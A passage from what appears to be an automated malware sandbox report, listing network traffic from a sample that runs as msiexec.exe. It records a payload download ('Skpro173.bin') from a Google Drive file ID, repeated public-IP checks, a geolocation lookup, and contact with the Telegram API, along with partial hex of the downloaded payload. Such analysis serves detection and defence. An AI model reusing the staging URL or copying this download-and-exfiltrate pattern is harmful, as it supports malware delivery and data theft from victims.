                                                                                      Oct 21, 2024 11:17:07.240391016 CEST44349755149.154.167.220192.168.2.4
                                                                                      Oct 21, 2024 11:17:07.240633965 CEST44349755149.154.167.220192.168.2.4
                                                                                      Oct 21, 2024 11:17:07.242434978 CEST49755443192.168.2.4149.154.167.220
                                                                                      Oct 21, 2024 11:17:07.283406019 CEST44349755149.154.167.220192.168.2.4
                                                                                      Oct 21, 2024 11:17:07.485275984 CEST44349755149.154.167.220192.168.2.4
                                                                                      Oct 21, 2024 11:17:07.485347986 CEST44349755149.154.167.220192.168.2.4
                                                                                      Oct 21, 2024 11:17:07.485399008 CEST49755443192.168.2.4149.154.167.220
                                                                                      Oct 21, 2024 11:17:07.487416029 CEST49755443192.168.2.4149.154.167.220
                                                                                      Oct 21, 2024 11:17:13.392421007 CEST4974180192.168.2.4193.122.6.168
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 21, 2024 11:16:45.194612980 CEST5643853192.168.2.41.1.1.1
                                                                                      Oct 21, 2024 11:16:45.201920986 CEST53564381.1.1.1192.168.2.4
                                                                                      Oct 21, 2024 11:16:46.549120903 CEST6427353192.168.2.41.1.1.1
                                                                                      Oct 21, 2024 11:16:46.556633949 CEST53642731.1.1.1192.168.2.4
                                                                                      Oct 21, 2024 11:16:51.750452042 CEST5623653192.168.2.41.1.1.1
                                                                                      Oct 21, 2024 11:16:51.759234905 CEST53562361.1.1.1192.168.2.4
                                                                                      Oct 21, 2024 11:16:53.118460894 CEST6384553192.168.2.41.1.1.1
                                                                                      Oct 21, 2024 11:16:53.127077103 CEST53638451.1.1.1192.168.2.4
                                                                                      Oct 21, 2024 11:17:06.370573997 CEST5640053192.168.2.41.1.1.1
                                                                                      Oct 21, 2024 11:17:06.378020048 CEST53564001.1.1.1192.168.2.4
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Oct 21, 2024 11:16:45.194612980 CEST192.168.2.41.1.1.10x61d7Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:46.549120903 CEST192.168.2.41.1.1.10xdc88Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:51.750452042 CEST192.168.2.41.1.1.10x7300Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:53.118460894 CEST192.168.2.41.1.1.10x28c7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:17:06.370573997 CEST192.168.2.41.1.1.10xcde9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Oct 21, 2024 11:16:45.201920986 CEST1.1.1.1192.168.2.40x61d7No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:46.556633949 CEST1.1.1.1192.168.2.40xdc88No error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:51.759234905 CEST1.1.1.1192.168.2.40x7300No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:51.759234905 CEST1.1.1.1192.168.2.40x7300No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:51.759234905 CEST1.1.1.1192.168.2.40x7300No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:51.759234905 CEST1.1.1.1192.168.2.40x7300No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:51.759234905 CEST1.1.1.1192.168.2.40x7300No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:51.759234905 CEST1.1.1.1192.168.2.40x7300No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:53.127077103 CEST1.1.1.1192.168.2.40x28c7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:16:53.127077103 CEST1.1.1.1192.168.2.40x28c7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                      Oct 21, 2024 11:17:06.378020048 CEST1.1.1.1192.168.2.40xcde9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      • drive.google.com
                                                                                      • drive.usercontent.google.com
                                                                                      • reallyfreegeoip.org
                                                                                      • api.telegram.org
                                                                                      • checkip.dyndns.org
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449738193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:16:51.767652988 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 21, 2024 11:16:52.621938944 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:52 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 9bc00e6c85eb7fc2c8c5790ee4a28506
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
                                                                                      Oct 21, 2024 11:16:52.628402948 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 21, 2024 11:16:52.877963066 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:52 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: d06ac4422c3e42b5d951bda59db5a98e
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
                                                                                      Oct 21, 2024 11:16:53.914788961 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 21, 2024 11:16:54.164432049 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 36d523984707c6e83e7a8905128988bd
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449741193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:16:54.936021090 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 21, 2024 11:16:55.789262056 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:55 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 1294afec4cb5c7a2f898c37b6e72b604
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449743193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:16:56.572761059 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 21, 2024 11:16:57.416898966 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:57 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 2111a887e760dcbf4bc96d7f1305bb58
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449745193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:16:58.211410046 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 21, 2024 11:16:59.050570011 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:16:58 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 309bc27590fab07e0e325a0c867243b1
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.449747193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:16:59.861597061 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 21, 2024 11:17:00.695373058 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:00 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: b5f61776d7b554f48e0fe3621614216b
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.449749193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:17:01.471379995 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 21, 2024 11:17:02.329632998 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:02 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 8c731b3ac1058152e8516f3e0fe2f82b
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.449751193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:17:03.085829973 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 21, 2024 11:17:03.932949066 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 7b273e8b2fc474e513789a322e663731
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.449753193.122.6.168807864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 21, 2024 11:17:04.704526901 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 21, 2024 11:17:05.548927069 CEST323INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 106
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 5f8bcf7e3392f3354fa488cf43b7f418
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449736216.58.206.464437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:16:46 UTC216OUTGET /uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2 HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                      Host: drive.google.com
                                                                                      Cache-Control: no-cache
                                                                                      2024-10-21 09:16:46 UTC1610INHTTP/1.1 303 See Other
                                                                                      Content-Type: application/binary
                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                      Date: Mon, 21 Oct 2024 09:16:46 GMT
                                                                                      Location: https://drive.usercontent.google.com/download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                      Content-Security-Policy: script-src 'nonce--Q9l_mbT8B-F3OdOqr1c3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                      Server: ESF
                                                                                      Content-Length: 0
                                                                                      X-XSS-Protection: 0
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449737142.250.186.334437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:16:47 UTC258OUTGET /download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                      Cache-Control: no-cache
                                                                                      Host: drive.usercontent.google.com
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-21 09:16:49 UTC4885INHTTP/1.1 200 OK
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Security-Policy: sandbox
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                                      X-Content-Security-Policy: sandbox
                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                      Cross-Origin-Resource-Policy: same-site
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Content-Disposition: attachment; filename="Skpro173.bin"
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: false
                                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 275520
                                                                                      Last-Modified: Sun, 20 Oct 2024 23:05:38 GMT
                                                                                      X-GUploader-UploadID: AHmUCY09kYS8BiCI5m0esUWSlDoQ_d-qblMzsucKhECdae4Y9nWS9dlZoY_m4oid83FJ9gExlR4
                                                                                      Date: Mon, 21 Oct 2024 09:16:49 GMT
                                                                                      Expires: Mon, 21 Oct 2024 09:16:49 GMT
                                                                                      Cache-Control: private, max-age=0
                                                                                      X-Goog-Hash: crc32c=dH5ogQ==
                                                                                      Server: UploadServer
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close
                                                                                      2024-10-21 09:16:49 UTC4885INData Raw: 30 35 b3 07 44 f0 bd a3 13 2b c1 99 11 3c e6 4d ce 0f 9b da a2 58 b6 51 b1 8f b0 71 cd 0d 87 b6 e8 88 f1 54 50 86 cf 29 38 35 42 80 a3 01 25 71 3e f6 11 c1 64 f0 f0 38 ed 39 6b 1e 06 bf b1 58 c3 27 52 4d 85 1c bf 2f a1 25 2c 25 40 f2 c0 87 13 d4 55 f5 be 41 da 57 5c a0 8a 0e 9f fa 11 17 2e bf 39 0e c9 96 68 d7 2b e9 9c 31 89 99 47 e5 85 a9 ad ae 3c 3a 21 c9 11 40 51 95 c3 42 e8 5a 8b c0 43 e3 7a 12 95 1d 96 30 1f 73 67 5f 1e 40 2a eb 1c 9c 16 dc 7b b3 6f c5 65 22 79 6e b4 57 90 03 b7 32 18 5b 69 69 93 54 e7 0a 21 cb ed 65 01 67 35 0b 0c ec 61 46 be e7 ca 41 c9 00 da a4 b1 0e 8e 42 27 a0 9b 3a c2 19 77 58 4d 61 b0 13 34 d5 29 e4 32 5a 4f 24 05 7f 4f 8f 84 60 80 e0 a3 6a 23 91 0a 87 d9 d1 9c 5c fc 19 ac d7 1b 5b ce 5d 93 0c 05 30 3f b4 46 66 68 64 11 5f ea
                                                                                      Data Ascii: 05D+<MXQqTP)85B%q>d89kX'RM/%,%@UAW\.9h+1G<:!@QBZCz0sg_@*{oe"ynW2[iiT!eg5aFAB':wXMa4)2ZO$O`j#\[]0?Ffhd_
                                                                                      2024-10-21 09:16:50 UTC4885INData Raw: 76 88 fb 2f e4 d9 36 84 05 da e2 23 93 91 f7 2a db 72 bd e6 26 d9 fb 28 74 fe 72 7e bc 4b 2c e2 2b 67 32 98 1b 21 60 ca 37 36 d1 d5 50 41 db 18 4e 68 e7 76 4a 77 28 01 a5 49 90 92 38 3b 2f 64 0d 62 fd bc a3 f2 51 e1 18 25 ae ac 78 24 eb dc 2d 76 ce 24 e2 6f 07 a3 93 80 f6 98 da 3b 72 93 aa ec 18 b2 85 05 e3 93 d1 53 94 58 fd 21 fe 3a 96 ca 65 e7 cf e4 5c c5 00 b5 6f f4 9b e1 a1 cb f8 33 4f 0e 0d be 63 7e 79 bc 62 7e 6f 51 32 c9 b6 6d ae 76 ed de 1e 9d 4b e5 1b 18 a0 07 ae 13 0f 70 c8 b7 aa 1a a9 4d 3e 73 e5 b8 58 0a 5b c3 8d 57 84 d2 ab d7 f1 88 c2 0e 8a 9e 49 b0 e9 7d b0 57 b5 a9 0e 4f 32 db 0b 91 1f fa b6 e6 13 ac 15 e0 0f 1e e4 78 59 40 3b 6b 8b 08 f4 2b 96 fc a1 89 1b ed 02 81 9e c3 7c d7 6d a7 21 17 c0 84 f2 bf a5 06 35 f4 06 f7 e0 e0 79 f2 c3 ca ed
                                                                                      Data Ascii: v/6#*r&(tr~K,+g2!`76PANhvJw(I8;/dbQ%x$-v$o;rSX!:e\o3Oc~yb~oQ2mvKpM>sX[WI}WO2xY@;k+|m!5y
                                                                                      2024-10-21 09:16:50 UTC40INData Raw: f5 db 29 33 9a d1 8f 2c 4e ef e9 44 b0 7c 61 0a 1a 30 b0 53 0e 75 5e 86 bb 47 64 1d 7b d1 b1 b3 a7 c5 49 6b 05 5e 1a 96
                                                                                      Data Ascii: )3,ND|a0Su^Gd{Ik^
                                                                                      2024-10-21 09:16:50 UTC1326INData Raw: eb a6 0f 03 e8 d2 67 29 50 64 02 ac d4 83 40 a6 b4 f0 1c ac 2b 5f e6 cf b4 ca 93 38 17 d3 d2 2d b0 b6 61 cf 71 9e 11 e9 1a 4d 85 8e 8b ec 61 b0 49 ce 81 d6 99 77 34 1b 74 e6 cc ed 6d 5d 99 62 da 12 90 cb 76 c1 70 eb a5 be c9 74 70 3c fc 01 31 be e1 3b 64 cc 69 72 01 55 5e bd d6 77 06 32 12 53 f6 0f 2d 8f 1e cb e8 f1 3e ce 22 f6 3d 43 90 3f 2a 8d bf cf 81 c6 81 ce e3 20 c1 80 d2 ea c0 88 5e 8f eb d1 d6 fd c2 49 a6 da db ba 9c 72 23 df ab 54 79 df 6d 32 e6 85 5a b2 04 8f 7c 6a 17 6d f5 10 12 8d fc 3c e3 14 f0 a2 5a 67 b2 60 b2 79 b1 4c 66 83 6d a9 8b 2d 60 8d df 66 89 df 34 c2 94 de 19 c8 4b 38 99 f7 6c 93 9c 17 d7 56 0e c9 a2 cd c1 67 81 23 65 68 19 ee b3 5a ef 5e 5f a4 51 ef c1 bb fe c6 5f 44 c5 fe b8 2e f3 f7 c1 c2 1d ba b9 40 85 94 13 50 26 3d 6d 5f b8
